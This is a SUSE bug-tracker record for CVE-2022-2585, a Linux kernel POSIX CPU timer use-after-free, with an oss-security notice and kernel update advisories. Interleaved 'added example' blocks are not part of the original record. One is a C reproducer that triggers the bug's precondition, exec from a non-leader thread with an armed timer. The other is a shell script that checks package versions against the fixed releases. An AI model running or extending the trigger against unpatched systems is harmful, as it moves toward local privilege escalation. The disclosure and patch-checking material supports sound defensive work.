Bug 1202094 (CVE-2022-2585)

Summary: VUL-0: CVE-2022-2585: kernel-source: use-after-free in POSIX CPU timer
Product: [Novell Products] SUSE Security Incidents
Reporter: Robert Frohl <rfrohl>
Component: Incidents
Assignee: Security Team bot <security-team>
Status: RESOLVED FIXED
QA Contact: Security Team bot <security-team>
Severity: Normal
Priority: P3 - Medium
CC: meissner, mkoutny, pmladek
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/338821/
Whiteboard: CVSSv3.1:SUSE:CVE-2022-2585:8.4:(AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
Bug Depends on:
Bug Blocks: 1202163

Comment 9 Robert Frohl 2022-08-10 05:48:29 UTC
oss-security:
CVE-2022-2585 - Linux kernel POSIX CPU timer UAF

It was discovered that when exec'ing from a non-leader thread, armed POSIX
CPU timers would be left on a list but freed, leading to a use-after-free.

An independent security researcher working with SSD Secure Disclosure
discovered that this vulnerability could be exploited for Local Privilege
Escalation.

This bug was introduced by commit 55e8c8eb2c7b ("posix-cpu-timers: Store a
reference to a pid not a task"), which is present since v5.7-rc1.

This has been assigned CVE-2022-2585.

A PoC that will trigger KASAN is going to be posted in a week.

A fix has been sent to linux-kernel@vger.kernel.org and is at
https://lore.kernel.org/lkml/20220809170751.164716-1-cascardo@canonical.com/T/#u.
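A minimal reproducer for the precondition described in comment 9 (a non-leader thread calling exec while it has an armed POSIX CPU timer), added here as an example. It is not the PoC the oss-security post announces and not code from the bug report or the kernel fix. It assumes the armed timer is on the exec'ing thread's own CPU clock (CLOCK_THREAD_CPUTIME_ID) and uses /bin/true as the exec target; both are this example's choices. On a fixed kernel it simply runs /bin/true and reports the child's exit status; on an affected kernel the freed-but-listed timer is only visible in the kernel log (KASAN), never in the program's own output, and whether this exact sequence reaches it on a given build is not something the example verifies.

```c
/* Added example, not from the bug report or the kernel patch.
 * Trigger condition from comment 9: exec from a non-leader thread while a
 * POSIX CPU timer is armed. Assumption of this example: the timer is on the
 * exec'ing thread's CPU clock (CLOCK_THREAD_CPUTIME_ID). */
#define _GNU_SOURCE
#include <pthread.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/* Runs in a non-leader thread: arm a CPU timer on this thread, then exec.
 * The exec replaces the whole process image, so this never returns. */
static void *exec_with_armed_timer(void *arg)
{
    const char *path = arg;
    timer_t tid;
    struct sigevent sev;
    struct itimerspec its;

    memset(&sev, 0, sizeof sev);
    sev.sigev_notify = SIGEV_NONE;          /* no delivery needed, just armed */
    if (timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &tid) != 0) {
        perror("timer_create");
        _exit(2);
    }
    memset(&its, 0, sizeof its);
    its.it_value.tv_sec = 3600;             /* far in the future: stays armed */
    if (timer_settime(tid, 0, &its, NULL) != 0) {
        perror("timer_settime");
        _exit(2);
    }
    execl(path, path, (char *)NULL);        /* exec from the non-leader thread */
    perror("execl");
    _exit(3);
}

/* Fork, run the trigger in the child, return the child's exit status:
 * 0 means the exec succeeded and `path` ran to completion. The parent waits
 * on the original child pid, which stays the thread group id across exec. */
int run_trigger(const char *path)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        pthread_t th;
        if (pthread_create(&th, NULL, exec_with_armed_timer, (void *)path) != 0)
            _exit(4);
        pthread_join(th, NULL);             /* does not return: the thread execs */
        _exit(5);
    }
    int status;
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    int rc = run_trigger("/bin/true");
    printf("child exit status: %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

Run it on a kernel with KASAN and watch dmesg; the program's own result is the same on fixed and affected kernels, which is exactly why the bug went unnoticed without a sanitizer.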
Comment 11 Swamp Workflow Management 2022-08-12 19:17:59 UTC
SUSE-SU-2022:2803-1: An update that solves 5 vulnerabilities, contains 7 features and has 16 fixes is now available.

Category: security (important)
Bug References: 1190256,1190497,1199291,1199356,1199665,1201258,1201323,1201391,1201458,1201592,1201593,1201595,1201596,1201635,1201651,1201691,1201705,1201726,1201846,1201930,1202094
CVE References: CVE-2021-33655,CVE-2022-21505,CVE-2022-2585,CVE-2022-26373,CVE-2022-29581
JIRA References: SLE-21132,SLE-24569,SLE-24570,SLE-24571,SLE-24578,SLE-24635,SLE-24682
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.14.21-150400.24.18.1, kernel-64kb-5.14.21-150400.24.18.1, kernel-debug-5.14.21-150400.24.18.1, kernel-default-5.14.21-150400.24.18.1, kernel-default-base-5.14.21-150400.24.18.1.150400.24.5.4, kernel-docs-5.14.21-150400.24.18.1, kernel-kvmsmall-5.14.21-150400.24.18.1, kernel-obs-build-5.14.21-150400.24.18.1, kernel-obs-qa-5.14.21-150400.24.18.1, kernel-source-5.14.21-150400.24.18.1, kernel-syms-5.14.21-150400.24.18.1, kernel-zfcpdump-5.14.21-150400.24.18.1
SUSE Linux Enterprise Workstation Extension 15-SP4 (src):    kernel-default-5.14.21-150400.24.18.1
SUSE Linux Enterprise Module for Live Patching 15-SP4 (src):    kernel-default-5.14.21-150400.24.18.1, kernel-livepatch-SLE15-SP4_Update_2-1-150400.9.5.2
SUSE Linux Enterprise Module for Legacy Software 15-SP4 (src):    kernel-default-5.14.21-150400.24.18.1
SUSE Linux Enterprise Module for Development Tools 15-SP4 (src):    kernel-docs-5.14.21-150400.24.18.1, kernel-obs-build-5.14.21-150400.24.18.1, kernel-source-5.14.21-150400.24.18.1, kernel-syms-5.14.21-150400.24.18.1
SUSE Linux Enterprise Module for Basesystem 15-SP4 (src):    kernel-64kb-5.14.21-150400.24.18.1, kernel-default-5.14.21-150400.24.18.1, kernel-default-base-5.14.21-150400.24.18.1.150400.24.5.4, kernel-source-5.14.21-150400.24.18.1, kernel-zfcpdump-5.14.21-150400.24.18.1
SUSE Linux Enterprise High Availability 15-SP4 (src):    kernel-default-5.14.21-150400.24.18.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 17 Swamp Workflow Management 2022-09-16 13:25:10 UTC
SUSE-SU-2022:3288-1: An update that solves 25 vulnerabilities, contains four features and has 91 fixes is now available.

Category: security (important)
Bug References: 1023051,1032323,1065729,1156395,1189999,1190497,1192968,1194592,1194869,1194904,1195480,1195917,1196616,1197158,1197391,1197755,1197756,1197757,1197763,1198410,1198577,1198702,1198971,1199356,1199515,1200301,1200313,1200431,1200544,1200845,1200868,1200869,1200870,1200871,1200872,1200873,1201019,1201308,1201361,1201442,1201455,1201489,1201610,1201726,1201768,1201865,1201940,1201948,1201956,1202094,1202096,1202097,1202113,1202131,1202154,1202262,1202265,1202346,1202347,1202385,1202393,1202447,1202471,1202558,1202564,1202623,1202636,1202672,1202681,1202710,1202711,1202712,1202713,1202715,1202716,1202757,1202758,1202759,1202761,1202762,1202763,1202764,1202765,1202766,1202767,1202768,1202769,1202770,1202771,1202773,1202774,1202775,1202776,1202778,1202779,1202780,1202781,1202782,1202783,1202822,1202823,1202824,1202860,1202867,1202872,1202898,1202989,1203036,1203041,1203063,1203098,1203107,1203117,1203138,1203139,1203159
CVE References: CVE-2016-3695,CVE-2020-36516,CVE-2021-33135,CVE-2021-4037,CVE-2022-1184,CVE-2022-20368,CVE-2022-20369,CVE-2022-2585,CVE-2022-2588,CVE-2022-26373,CVE-2022-2639,CVE-2022-2663,CVE-2022-28356,CVE-2022-28693,CVE-2022-2873,CVE-2022-2905,CVE-2022-2938,CVE-2022-2959,CVE-2022-2977,CVE-2022-3028,CVE-2022-3078,CVE-2022-36879,CVE-2022-36946,CVE-2022-39188,CVE-2022-39190
JIRA References: SLE-19359,SLE-23766,SLE-24572,SLE-24682
Sources used:
openSUSE Leap 15.4 (src):    kernel-azure-5.14.21-150400.14.13.1, kernel-source-azure-5.14.21-150400.14.13.1, kernel-syms-azure-5.14.21-150400.14.13.1
SUSE Linux Enterprise Module for Public Cloud 15-SP4 (src):    kernel-azure-5.14.21-150400.14.13.1, kernel-source-azure-5.14.21-150400.14.13.1, kernel-syms-azure-5.14.21-150400.14.13.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
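As an added example (not part of either advisory and not SUSE tooling), a small POSIX shell check that compares an installed kernel package's VERSION-RELEASE against the first fixed versions listed above in SUSE-SU-2022:2803-1 (kernel-default and the other 15-SP4 flavours) and SUSE-SU-2022:3288-1 (kernel-azure). It assumes GNU coreutils `sort -V` for the comparison and uses the package names exactly as they appear in the advisories; the `rpm --queryformat` call in the usage comment is standard rpm.

```sh
# Added example, not from the SUSE advisories. Fixed VERSION-RELEASE strings
# are copied from SUSE-SU-2022:2803-1 and SUSE-SU-2022:3288-1 above.
fixed_version_for() {
    case "$1" in
        kernel-default|kernel-64kb|kernel-debug|kernel-kvmsmall|kernel-zfcpdump|kernel-source|kernel-syms|kernel-docs|kernel-obs-build|kernel-obs-qa)
            echo "5.14.21-150400.24.18.1" ;;
        kernel-azure|kernel-source-azure|kernel-syms-azure)
            echo "5.14.21-150400.14.13.1" ;;
        *)  return 1 ;;
    esac
}

# is_fixed PKG VERSION-RELEASE
# Returns 0 when VERSION-RELEASE is >= the first fixed version for PKG,
# 1 when it is older, 2 when PKG is not covered by these advisories.
# Assumption: sort -V (GNU coreutils) orders these dotted numeric strings
# correctly, which holds for the release numbers involved here.
is_fixed() {
    pkg=$1
    have=$2
    want=$(fixed_version_for "$pkg") || return 2
    lowest=$(printf '%s\n%s\n' "$want" "$have" | sort -V | head -n 1)
    [ "$lowest" = "$want" ]
}

# Live check on a SUSE 15-SP4 / Leap 15.4 host (not executed here):
#   for p in kernel-default kernel-azure; do
#     rpm -q --qf '%{VERSION}-%{RELEASE}\n' "$p" 2>/dev/null | while read -r v; do
#       if is_fixed "$p" "$v"; then echo "$p-$v: fixed"; else echo "$p-$v: NOT fixed"; fi
#     done
#   done
```

The comparison is "greater or equal" because later releases of the same package carry the fix as well. Two caveats: the newest installed package is not necessarily the running kernel until the host has rebooted, so check `uname -r` separately; and on the Live Patching module the advisory ships kernel-livepatch-SLE15-SP4_Update_2 alongside the kernel, so a host protected by the livepatch can be reported as "NOT fixed" by a package-version check alone.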
Comment 18 Marcus Meissner 2022-11-04 14:29:19 UTC
done